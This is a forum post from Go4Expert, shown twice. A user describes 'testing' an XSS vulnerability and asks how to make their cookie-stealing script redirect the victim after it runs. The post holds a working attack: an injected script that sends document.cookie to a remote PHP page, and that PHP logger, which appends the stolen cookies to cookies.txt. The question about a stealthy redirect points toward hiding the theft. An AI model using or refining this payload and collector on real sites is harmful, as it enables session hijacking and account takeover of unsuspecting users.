Go4Expert - View Single Post

Toddie

I am testing a xss vulnerability but your script does not work.
your script redirects but does not log cookies.

I am using this script right now and it works fine.

xss injection<script>document.location='url/cookiestealer.php?cookie='+escape(document.cookie) </script>

when i use this injection code cookies are logged into cookies.txt via this script

cookiestealer.php

Quote:

<?php
$cookie = $_GET['cookie'];
$log = fopen("cookies.txt", "a");
fwrite($log, $cookie ."\n");
fclose($log);
?>

This works fine but it does not redirect to a new page. I tried adding redirect code to the injected code and also to the .php file itself and there has been no success. Tampering with the code tends to redirect the page before the logging function executes, or does not redirect the page at all, or both.

I tried your script and it does not work.
why does your script not log cookies? where is the error? If you can't answer that question then here is another question.

what do I need to do to get my script able to redirect to another page after it executes?

Toddie Contributor
9Jan2010,11:12
	I am testing a xss vulnerability but your script does not work. your script redirects but does not log cookies. I am using this script right now and it works fine. xss injection<script>document.location='url/cookiestealer.php?cookie='+escape(document.cookie) </script> when i use this injection code cookies are logged into cookies.txt via this script cookiestealer.php Quote: <?php $cookie = $_GET['cookie']; $log = fopen("cookies.txt", "a"); fwrite($log, $cookie ."\n"); fclose($log); ?> This works fine but it does not redirect to a new page. I tried adding redirect code to the injected code and also to the .php file itself and there has been no success. Tampering with the code tends to redirect the page before the logging function executes, or does not redirect the page at all, or both. I tried your script and it does not work. why does your script not log cookies? where is the error? If you can't answer that question then here is another question. what do I need to do to get my script able to redirect to another page after it executes?